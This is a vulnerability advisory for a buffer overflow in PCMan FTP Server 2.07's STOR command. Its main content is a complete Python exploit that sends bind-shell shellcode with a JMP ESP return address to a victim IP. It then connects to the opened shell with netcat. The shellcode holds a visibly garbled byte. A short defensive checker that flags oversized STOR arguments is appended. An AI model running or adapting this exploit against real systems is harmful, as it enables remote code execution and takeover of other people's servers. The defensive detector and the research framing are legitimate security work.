Release date:
Updated on: 2013-08-22
Affected Systems:
PCMan FTP Server 2.07
Description:
--------------------------------------------------------------------------------
Bugtraq id: 61840
PCMan FTP Server is FTP server software.
When PCMan FTP 2.07 receives a long STOR command whose argument contains the /../ parameter, a buffer overflow is triggered. Attackers can exploit this vulnerability to execute arbitrary code in the context of the affected application.
Source: Polunchis
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users act at their own risk!
#!/usr/bin/python
# Exploit Title: PCMan FTP 2.07 STOR Command - Buffer Overflow
# Date: 18 August 2013
# Exploit Author: Christian (Polunchis) Ramirez https://intrusionlabs.org
# Contact: polunchis@intrusionlabs.org
# Version: PCMan FTP 2.07 STOR Command
# Tested on: Windows XP SP3, Spanish
# Thanks: To GOD for giving me wisdom
#
# Description:
# A buffer overflow is triggered when a long STOR command followed by the /../ parameter is sent to the server
# (Python 2 script: print statements and byte-oriented str literals)
import socket, sys, os, time

if len(sys.argv) != 3:
    print "[*] Uso: %s <Ip Victima> <Puerto>\n" % sys.argv[0]
    print "[*] Exploit created by Polunchis"
    print "[*] https://www.intrusionlabs.org"
    sys.exit(0)

target = sys.argv[1]
port = int(sys.argv[2])

# msfpayload windows/shell_bind_tcp LPORT=28876 R | msfencode -a x86 -b '\x00\xff\x0a\x0d\x20\x40' -t c
shellcode = (
    "\xda\xcf\xb8\xba\xb3\x1e\xe7\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
    "\x56\x31\x42\x18\x83\xc2\x04\x03\x42\xae\x51\xeb\x1b\x26\x1c"
    "\x14\xe4\xb6\x7f\x9c\x01\x87\xad\xfa\x42\xb5\x61\x88\x07\x35"
    "\x09\xdc\xb3\xce\x7f\xc9\xb4\x67\x35\x2f\xfa\x78\xfb\xef\x50"
    "\xba\x9d\x93\xaa\xee\x7d\xad\x64\xe3\x7c\xea\x99\x0b\x2c\xa3"
    "\xd6\xb9\xc1\xc0\xab\x01\xe3\x06\xa0\x39\x9b\x23\x77\xcd\x11"
    "\x2d\xa8\x7d\x2d\x65\x50\xf6\x69\x56\x61\xdb\x69\xaa\x28\x50"
    "\x59\x58\xab\xb0\x93\xa1\x9d\xfc\x78\x9c\x11\xf1\x81\xd8\x96"
    "\xe9\xf7\x12\xe5\x94\x0f\xe1\x97\x42\x85\xf4\x30\x01\x3d\xdd"
    "\xc1\xc6\xd8\x96\xce\xa3\xaf\xf1\xd2\x32\x63\x8a\xef\xbf\x82"
    "\x5d\x66\xfb\xa0\x79\x22\x58\xc8\xd8\x8e\x0f\xf5\x3b\x76\xf0"
    "\x53\x37\x95\xe5\xe2\x1a\xf2\xca\xd8\xa4\x02\x44\x6a\xd6\x30"
    "\xcb\xc0\ cross\x79\x84\xce\x87\x7e\xbf\xb7\x18\x81\x3f\xc8\x31"  # the byte garbled to "\ cross" in the source is unrecoverable
    "\x46\x6b\x98\x29\x6f\x13\x73\xaa\x90\xc6\xd4\xfa\x3e\xb8\x94"
    "\xaa\xfe\x68\x7d\xa1\xf0\x57\x9d\xca\xda\xee\x99\x04\x3e\xa3"
    "\x4d\x65\xc0\x33\x42\xe0\x26\xd9\x4a\xa5\xf1\x75\xa9\x92\xc9"
    "\xe2\xd2\xf0\x65\xbb\x44\x4c\x60\x7b\x6a\x4d\xa6\x28\xc7\xe5"
    "\x21\xba\x0b\x32\x53\xbd\x01\x12\x1a\x86\xc2\xe8\x72\x45\x72"
    "\xec\x5e\x3d\x17\x7f\x05\xbd\x5e\x9c\x92\xea\x37\x52\xeb\x7e"
    "\xaa\xcd\x45\x9c\x37\x8b\xae\x24\xec\x68\x30\xa5\x61\xd4\x16"
    "\xb5\xbf\xd5\x12\xe1\x6f\x80\xcc\x5f\xd6\x7a\xbf\x09\x80\xd1"
    "\x69\xdd\x55\x1a\xaa\x9b\x59\x77\x5c\x43\xeb\x2e\x19\x7c\xc4"
    "\xa6\xad\x05\x38\x57\x51\xdc\xf8\x67\x18\x7c\xa8\xef\xc5\x15"
    "\xe8\x6d\xf6\xc0\x2f\x88\x75\xe0\xcf\x6f\x65\x81\xca\x34\x21"
    "\x7a\xa7\x25\xc4\x7c\x14\x45\xcd"
)

# 7C86467B   FFE4   JMP ESP
# jmp esp in KERNEL32.DLL (Windows XP SP3, Spanish)
garbage = '\x41' * 2005                 # padding up to the saved return address
jmpesp = '\x7B\x46\x86\x7c'             # 0x7C86467B, little-endian
fixstack = '\x83\xc4\x9c'               # add esp, -0x64: move esp clear of the payload
vulparameter = '/../'
nop = '\x90' * 4
buffer = garbage + jmpesp + nop + fixstack + shellcode

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[+] Connect to %s on port %d" % (target, port)
try:
    s.connect((target, port))
    s.recv(1024)
    s.send('user anonymous\r\n')
    s.recv(1024)
    s.send('pass polunchis\r\n')
    s.recv(1024)
    s.send("STOR " + vulparameter + buffer + "\r\n")
    print "[+] Sending payload of size", len(buffer)
    s.close()
    print "[+] Exploit Sent Successfully"
    print "[+] Waiting for 5 sec before spawning shell to " + target + ":28876\r"
    print "\r"
    time.sleep(5)
    os.system("nc -n " + target + " 28876")
    print "[-] Connection lost from " + target + ":28876\r"
except:
    print "[-] Could not connect to " + target + ":21\r"
    sys.exit(0)
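As an added defensive example (not part of the advisory or of PCMan FTP), the following checker inspects FTP control-channel command lines and flags STOR requests with the shape of the crash trigger described above: a '/../' component followed by an oversized argument (the payload above exceeds 2000 bytes). The length threshold, the regex and the sample session are assumptions constructed for the example.

```python
import re

# A plausible filename fits easily within this limit; the advisory's payload
# exceeds 2000 bytes. The threshold is an assumption, tune it per deployment.
MAX_STOR_ARG_LEN = 512

# RFC 959 command line: 3-4 letter verb, optional whitespace-separated argument.
FTP_CMD_RE = re.compile(r"^(?P<cmd>[A-Za-z]{3,4})(?:\s+(?P<arg>.*))?$")

def classify_ftp_command(line):
    """Return (command, verdict, reason); verdict is 'ok', 'suspicious' or 'malformed'."""
    m = FTP_CMD_RE.match(line.rstrip("\r\n"))
    if not m:
        return (None, "malformed", "not an RFC 959 command line")
    cmd = m.group("cmd").upper()
    arg = m.group("arg") or ""
    if cmd != "STOR":
        return (cmd, "ok", "")
    reasons = []
    if "/../" in arg:
        reasons.append("path traversal component '/../'")
    if len(arg) > MAX_STOR_ARG_LEN:
        reasons.append("argument length %d exceeds %d" % (len(arg), MAX_STOR_ARG_LEN))
    if reasons:
        return (cmd, "suspicious", "; ".join(reasons))
    return (cmd, "ok", "")

def scan_session(lines):
    """Return [(line_no, command, reason)] for every suspicious command line."""
    hits = []
    for i, line in enumerate(lines, 1):
        cmd, verdict, reason = classify_ftp_command(line)
        if verdict == "suspicious":
            hits.append((i, cmd, reason))
    return hits

# Constructed sample session: normal login and upload, then the overflow pattern.
SAMPLE_SESSION = [
    "USER anonymous\r\n",
    "PASS guest@example.invalid\r\n",
    "STOR report.txt\r\n",
    "STOR /../" + "A" * 2005 + "\r\n",
]

if __name__ == "__main__":
    for line_no, cmd, reason in scan_session(SAMPLE_SESSION):
        print("line %d: %s flagged (%s)" % (line_no, cmd, reason))
```

The same check can run server-side before the STOR argument is copied into any fixed-size buffer, rejecting the command with a 5xx reply instead of processing it.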
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
PCMan
-----
Currently, the vendor has not provided a patch or upgrade. We recommend that users of this software follow the vendor's homepage to obtain the latest version:
https://files.secureserver.net/1sMltFOsytirTG